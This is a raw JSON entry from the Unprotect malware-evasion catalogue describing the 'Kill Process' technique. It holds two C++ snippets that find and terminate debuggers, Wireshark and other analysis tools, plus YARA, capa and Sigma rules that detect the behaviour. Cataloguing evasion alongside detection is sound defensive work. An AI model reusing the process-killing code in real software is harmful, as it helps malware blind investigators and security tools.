GET /api/techniques/131/
HTTP 200 OK
Allow: GET, PUT, PATCH, DELETE, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "name": "Kill Process",
    "category": [
        "https://search.unprotect.it/api/categories/6/"
    ],
    "description": "Malware can kill processes such as AV process or monitoring process. For example, \"wireshark.exe\", \"ida.exe\", \"procmon.exe\" or any other process related to malware analysis tools in order to avoid the investigation.",
    "resources": "https://www.bleepingcomputer.com/news/security/coinminer-comes-with-a-process-kill-list-to-keep-competitors-at-bay/",
    "tags": "kill",
    "snippets": [
        {
            "language": "https://search.unprotect.it/api/snippet_languages/2/",
            "author": "https://search.unprotect.it/api/snippet_authors/13/",
            "technique": "https://search.unprotect.it/api/techniques/131/",
            "description": "",
            "plain_code": "#include <iostream>\r\n#include <Windows.h>\r\n#include <Psapi.h>\r\n#include <vector>\r\n#include <TlHelp32.h>\r\n\r\n#pragma comment(lib, \"Psapi\")\r\n#pragma comment(lib,\"ntdll.lib\")\r\n\r\ntypedef NTSTATUS(NTAPI* _NtGetNextProcess)(\r\n\t_In_ HANDLE ProcessHandle,\r\n\t_In_ ACCESS_MASK DesiredAccess,\r\n\t_In_ ULONG HandleAttributes,\r\n\t_In_ ULONG Flags,\r\n\t_Out_ PHANDLE NewProcessHandle\r\n\t);\r\n\r\nstd::vector<std::string> procs =\r\n{\r\n\t\"ProcessHacker.exe\", \r\n\t\"Wireshark.exe\"\r\n};\r\n\r\nauto terminate_process() -> void\r\n{\r\n\tHMODULE ntdll = GetModuleHandleA(\"ntdll.dll\");\r\n\tHANDLE currp = nullptr;\r\n\tchar buf[1024] = { 0 };\r\n\r\n\t_NtGetNextProcess NtGetNextProcess = (_NtGetNextProcess)GetProcAddress(ntdll, \"NtGetNextProcess\");\r\n\r\n\tfor (int i = 0; i < procs.size(); i++) {\r\n\t\tdo {\r\n\t\t\tGetModuleFileNameExA(currp, 0, buf, MAX_PATH);\r\n\t\t\tif (strstr(buf, procs[i].c_str()))\r\n\t\t\t\tTerminateProcess(currp, -1);\r\n\t\t} while (!NtGetNextProcess(currp, MAXIMUM_ALLOWED, 0, 0, &currp));\r\n\t}\r\n}\r\n\r\nint main()\r\n{\r\n\tterminate_process();\r\n\treturn 0;\r\n}"
        },
        {
            "language": "https://search.unprotect.it/api/snippet_languages/2/",
            "author": "https://search.unprotect.it/api/snippet_authors/2/",
            "technique": "https://search.unprotect.it/api/techniques/131/",
            "description": "Using the `CreateToolhelp32Snapshot` API, it is possible to list the running process and compare it with a blacklist to kill them.",
            "plain_code": "#include <iostream>\r\n#include <string>\r\n#include <tchar.h>\r\n#include <process.h>\r\n#include <windows.h>\r\n#include <tlhelp32.h>\r\n\r\nusing namespace std;\r\n\r\nBOOL GetProcessList();\r\nBOOL TerminateMyProcess(DWORD dwProcessId, UINT uExitCode);\r\n\r\nint main( void )\r\n{\r\n  GetProcessList( );\r\n  return 0;\r\n}\r\n\r\nBOOL GetProcessList( )\r\n{\r\n  HANDLE hProcessSnap;\r\n  HANDLE hProcess;\r\n  PROCESSENTRY32 pe32;\r\n  DWORD dwPriorityClass;\r\n\r\n  //Blacklisted processes\r\n  LPSTR ProcessName[] = { \"ida.Exe\",\r\n                          \"ProcMon.exe\",\r\n                          \"Olldbg.exe\",\r\n                          \"Wireshark.exe\",\r\n                          \"iexplore.exe\"\r\n                            };\r\n\r\n  // Take a snapshot of processes\r\n  hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );\r\n  if( hProcessSnap == INVALID_HANDLE_VALUE )\r\n  {\r\n    return( FALSE );\r\n  }\r\n\r\n  pe32.dwSize = sizeof( PROCESSENTRY32 );\r\n\r\n  if( !Process32First( hProcessSnap, &pe32 ) )\r\n  {\r\n    CloseHandle( hProcessSnap );\r\n    return( FALSE );\r\n  }\r\n\r\n  do\r\n  {\r\n    string str(pe32.szExeFile);\r\n\r\n    for (int i = 0; i < (sizeof(ProcessName) / sizeof(LPSTR)); i++)\r\n    {\r\n         if(str == ProcessName[i])\r\n         {\r\n             cout << \"[*] processus exists: \" << (ProcessName[i]) << endl;\r\n             TerminateBlacklistedProcess(pe32.th32ProcessID, 1);\r\n         }\r\n    }\r\n  } while( Process32Next( hProcessSnap, &pe32 ) );\r\n\r\n  CloseHandle( hProcessSnap );\r\n  return( TRUE );\r\n}\r\n\r\n// Terminate the blacklisted processes\r\nBOOL TerminateBlacklistedProcess(DWORD dwProcessId, UINT uExitCode)\r\n{\r\n    DWORD dwDesiredAccess = PROCESS_TERMINATE;\r\n    BOOL  bInheritHandle  = FALSE;\r\n    HANDLE hProcess = OpenProcess(dwDesiredAccess, bInheritHandle, dwProcessId);\r\n    if (hProcess == NULL)\r\n        return FALSE;\r\n\r\n    BOOL result = TerminateProcess(hProcess, uExitCode);\r\n\r\n    CloseHandle(hProcess);\r\n\r\n    return result;\r\n}"
        }
    ],
    "detection_rules": [
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/1/",
            "name": "UNPROTECT_disable_process",
            "rule": "import \"pe\"\r\n\r\nrule UNPROTECT_disable_process\r\n{\r\n    meta:\r\n\tauthor = \"Thomas Roccia | @fr0gger_\"\r\n\tdescription = \"Disable blacklisted processes\"\r\n\r\n    strings:\r\n        $api1 = \"CreateToolhelp32Snapshot\" nocase\r\n        $api2 = \"Process32First\" nocase\r\n        $api3 = \"Process32Next\" nocase\r\n\r\n        $p1 = \"taskkill.exe\" nocase\r\n        $p2 = \"tskill.exe\" nocase\r\n\r\ncondition:\r\n        uint32(uint32(0x3C)) == 0x4550 and 3 of ($api*) or any of ($p*) \r\n}"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
            "name": "kill_process",
            "rule": "rule:\r\n  meta:\r\n    name: reference analysis tools strings\r\n    namespace: anti-analysis\r\n    author: michael.hunhoff@fireeye.com\r\n    scope: file\r\n    mbc:\r\n      - Discovery::Analysis Tool Discovery::Process Detection [B0013.001]\r\n    references:\r\n      - https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiAnalysis/process.cpp\r\n    examples:\r\n      - al-khaser_x86.exe_\r\n  features:\r\n    - or:\r\n      - string: /ollydbg.exe/i\r\n      - string: /ProcessHacker.exe/i\r\n      - string: /tcpview.exe/i\r\n      - string: /autoruns.exe/i\r\n      - string: /autorunsc.exe/i\r\n      - string: /filemon.exe/i\r\n      - string: /procmon.exe/i\r\n      - string: /regmon.exe/i\r\n      - string: /procexp.exe/i\r\n      - string: /idaq.exe/i\r\n      - string: /idaq64.exe/i\r\n      - string: /ImmunityDebugger.exe/i\r\n      - string: /Wireshark.exe/i\r\n      - string: /dumpcap.exe/i\r\n      - string: /HookExplorer.exe/i\r\n      - string: /ImportREC.exe/i\r\n      - string: /PETools.exe/i\r\n      - string: /LordPE.exe/i\r\n      - string: /SysInspector.exe/i\r\n      - string: /proc_analyzer.exe/i\r\n      - string: /sysAnalyzer.exe/i\r\n      - string: /sniff_hit.exe/i\r\n      - string: /windbg.exe/i\r\n      - string: /joeboxcontrol.exe/i\r\n      - string: /joeboxserver.exe/i\r\n      - string: /ResourceHacker.exe/i\r\n      - string: /x32dbg.exe/i\r\n      - string: /x64dbg.exe/i\r\n      - string: /Fiddler.exe/i\r\n      - string: /httpdebugger.exe/i\r\n      - string: /fakenet.exe/i\r\n      - string: /netmon.exe/i\r\n      - string: /WPE PRO.exe/i\r\n      - string: /decompile.exe/i"
        },
        {
            "type": "https://search.unprotect.it/api/detection_rule_categories/3/",
            "name": "kill_process",
            "rule": "title: Kill multiple process\r\nstatus: experimental\r\ndescription: Kill multiple process\r\nauthor: Joe Security\r\ndate: 2019-12-30\r\nid: 200039\r\nthreatname:\r\nbehaviorgroup: 18\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*cmd*taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*& taskkill /f*'\r\n      condition: selection\r\nlevel: critical"
        }
    ]
}